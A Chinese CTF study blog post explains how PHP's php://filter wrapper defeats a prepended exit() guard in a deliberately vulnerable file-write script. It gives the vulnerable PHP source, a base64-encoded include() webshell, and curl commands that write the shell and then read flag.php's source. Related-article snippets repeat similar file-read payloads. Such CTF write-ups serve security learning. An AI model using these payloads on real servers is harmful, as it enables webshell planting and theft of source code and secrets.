php://filter协议在任意文件读取漏洞中的利用二(学习总结)

最新推荐文章于 2023-06-28 21:21:02 发布
最新推荐文章于 2023-06-28 21:21:02 发布
阅读量1k 收藏 1
点赞数
分类专栏: CTF学习总结 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L2329794714/article/details/121296780
版权

一、练习题目源码

  •  练习题目描述:

        练习任务:为获取web目录下的flag信息。

        index.php 接受GET 输入str,并保存在test/test.php中,但用户输入的字符前会自动添加 exit() 退出函数,使得test.php 没机会执行用户输入的shell就退出。flag信息隐藏在flag.php中,但直接访问falg.php,被不会得到flag。 

#index.php 文件
<?
<?php
        $str="<?php exit(); ?>";
        $str=$str.$_GET['str'];
        $file=$_GET['file'];
        file_put_contents('$file,$str);
?>


#flag.php 文件


<?php
    echo "hello world!";
    #flag{testflag}
?>



//flag.php index.php 和test目录在一个目录下 test 为一个777 权限的目录
  • 练习思路:

         通过php://filter/write= 转换类过滤器 对目标输入流进行转换,及让str在写入目标文件前进行一次编码转化,使自动添加的保护代码(<?php exit(); ?>)变为乱码。

        向test目录下的任意php文件写入任意文件读取代码:<?php include(['file']); ?> 。

        l利用写入的shell 和php://filter/read=    获得flag.php源码信息。

二、练习过程:

构成shell数据:

 注意:因为<?php exit(); ?> 中的base64 编码的有效位有7 位 要保证整个字符串长度是4的倍数,及在shell 前加一个字符

如下

PD9waHAKaW5jbHVkZSgkX0dFVFsnZmlsZSddKTsKPz4=

 利用php://filter 构造url如下

 curl "http://ip/?file=php://filter/write=convert.base64-decode/resource=test/test.php&str=APD9waHAKaW5jbHVkZSgkX0dFVFsnZmlsZSddKTsKPz4="

 如下test/test.php 成功写入shell 

 

直接通过test.php 访问flag.php,看不到任何flag信息 

 

 

 通过php://filter 构造url 访问flag.php 如下

curl "http://ip/test/test.php?file=php://filter/read=convert.base64-encode/resource=../flag.php"

 得到base64编码的数据

 base64解码得到flag

 

 

 

 

 

头秃的bug
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
在本节课程,我们将讨论XXE漏洞利用方法,特别是任意文件读取的实现。通过学习本节内容,您将掌握XXE漏洞的基本原理和利用方法,从而更好地保护自己的Web应用程序。 1. 测试代码介绍 在开始学习XXE漏洞利用...
Actf2020 Include[关于php://filter协议读取文件的wriptup]
sGanYu
09-16 1445
[ACTF2020 新生赛]Include 在点击tips后,提示需要从找出flag 这里需要用到php://filter协议读内容 php://filter/read=convert.base64-encode/resource=index.php php://filterphp独有的一个协议,可以作为一个间流来处理其他流,也可以进行任意文件读取,具有resource(要过滤的数据流)、read(读链筛选的数据流)、write(写链筛选的数据流)等等参数。​ 在知道使.
[PHP底层]关于php://filter的分析
Y4tacker的博客
11-08 1947
文章目录写在前面关于php://filter的处理的一些简单解释php://filter常规流程分析关于exp的分析题外话 写在前面 慢慢不太想写博客了,很多东西都忙不过来,学的很多,今天抽出空来还是督促自己写一篇,灵感来源于刚刚在网上看到的一篇wp,https://xz.aliyun.com/t/10446,不得不说现在比赛可真多哈,小伙伴们也别太经常打,多做点实际的东西 关于php://filter的处理的一些简单解释 这里面呢,有几个比较关键的,一个是需要能获取到文件流(也就是我们后面常常写的reso
php://filter协议任意文件读取漏洞利用学习总结
L2329794714的博客
11-12 3236
一、php://协议 官网解释为: php://—AccessingvariousI/O streams PHP provides a number of miscellaneous I/O streams that allow access to PHP's own input and output streams, the standard input, output and error file descriptors, in-memory and disk-backe...
php://filter 的使用
hhh
09-03 2万+
今天做bugku的基础题遇见的……很神奇,真心涨姿势(好吧其实我现在每做一道题都是涨知识) 题目:flag在index里 链接:呼哈哈 题解: 可以看到题目打开的界面里 注意这里:?file=show.php;可以联想到文件包含漏洞,然后我们就可以用php://filter协议来查看源文件内容; 构造:php://filter/read=convert.base64-encode/...
php 读取目录
weixin_42136237的博客
10-05 1091
php 读取目录
php协议.pdfphp协议.pdfphp协议.pdf
最新发布
02-24
- 当存在 SSRF 漏洞文件包含漏洞时,可以用来读取系统任意文件。 - 在文件包含漏洞,攻击者可能会尝试使用此协议执行任意系统命令或读取敏感文件。 ##### 2. `php://input` - **定义**:用于访问 HTTP ...
php协议.zipphp协议.zip
02-24
然而,由于这些功能的潜在安全风险,如文件系统的任意读取或写入,现代PHP环境通常会限制或禁用对这些伪协议的直接访问。 例如,`data:`伪协议曾被用来在内存创建数据流,但是由于可能导致代码注入,现在已被...
文件包含1
08-03
在IT行业,特别是涉及到Web开发和安全领域,"文件包含1"这个标题可能是指一种常见的安全漏洞,即文件包含漏洞(File Inclusion Vulnerability)。这种漏洞通常发生在PHP环境,允许攻击者通过注入恶意代码来控制...
php打开远程文件的方法和风险及解决方法
10-26
在上述代码,如果用户通过URL参数`filename`传递了一个远程地址,那么恶意用户就可以通过操纵这个参数来读取任何他们想要的远程文件,甚至执行任意代码。这就是所谓的“远程文件包含”漏洞,它可能导致跨站脚本...
理解php://filter用处
李二胖的博客
06-28 230
=为字符串拼接使用,在’<?>'后所有代码均不执行,因为提前有了个exit的动作。使用file=php://filter/write=convert.base64-decode/resource=flag.phpphp文件内部分内容类似于注释等内容无法在界面展示出来,使用php://filter可以实现文件的取,另外如果直接读取文件也同样无法读取全部内容,因此使用base64加密的方式将全部内容输出出来。开始做一些简单的web题目,遇到的第一个题目[ACTF2020 新生赛]Include。
php协议读取目录,PHP文件包含,文件读取利用思路,以及配合伪协议的trick...
weixin_31178795的博客
03-28 1329
PHP文件包含函数有两类,分三种:12file_get_contents()include()/include_once() require/require_once()第一种用于获取文件的数据,第二种用于包含并执行代码与读取文件两种功能php文件的函数1file_put_contents()基本的思路就是用来写shell吧,不过会有各种限制,但是结合伪协议就可以简单绕过了file_get_...
phpfilter的妙用
weixin_44576725的博客
04-14 4593
php://filter的妙用 php://filterPHP独有的协议利用这个协议可以创造很多“妙用”。 php://filter php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、file()和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。 php://filter 目标使用以下的参数作为它路径的一部分。 复合过滤链能够在一个路径上指定。
【ctf】php://filter/read=convert.base64-encode/resource=
chualam的博客
11-03 3321
题目flag在index里 打开后url有file= 发现index.php打开后没东西 于是就用到这个语句 这个语句的作用就是作为一个协议流的间流 处理其他流 可以作为文件包含漏洞的攻击 至于为什么没有显示flag 肯定被注入掉了 这个协议还可以攻击一些php写入了exit导致无法连接菜刀的问题 把<>这些过滤掉 ...
bugku CTF题
qq_46116117的博客
04-06 974
web题 矛盾: !is_numeric()函数: 用于检测变量是否为数字或数字字符串 如果指定的变量是数字和数字字符串则返回 TRUE,否则返回 FALSE 需要num不为数字字符串或者数字,但num=1; 则,num=1*e0.1或num=1x,x为任意字符 web3 查看源代码得 <!--&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&
PHP文件包含漏洞
qq_33505576的博客
06-27 303
file=php://filter/read=convert.base64-encode/resource=index.php php://filter/是一种访问本地文件协议,/read=convert.base64-encode/表示读取的方式是base64编码后,resource=index.php表示目标文件为index.php。 通过传递这个参数可以得到index.php的源码,下面说...
PHP协议filter详解,php://filter协议过滤器
wangyuxiang946的博客
06-12 1万+
PHP://filter协议 PHP filter 过滤器
CTF PHP协议总结
秋叶依剑
11-09 1400
CTF PHP协议总结 php://filter php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。 php://filter 目标使用以下的参数作为它路径的一部分。 复合过...
通过php://filter/read=convert.base64-encode/resource= 利用LFI来查看源码
热门推荐
Taowood的博客
07-25 3万+
PHP LFI读php文件源码以及直接post webshell 假设如下一个场景 (1) http://vulnerable/fileincl/example1.php?page=intro.php(该php文件包含LFI漏洞) (2) 但是你没有地方可以upload你的webshell代码 (3) LFI只能读取到非php文件的源码(因为无法解析执行 只能被爆菊花) (4) 如果你能...
php://filter协议
10-10
php://filter是一个PHP的伪协议,可以用于在数据流上使用各种过滤器。使用该伪协议,可以对数据流进行过滤和处理,同时还可以实现一些特殊功能。 在php://filter协议,以“|”符号分隔过滤器的名称和参数,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值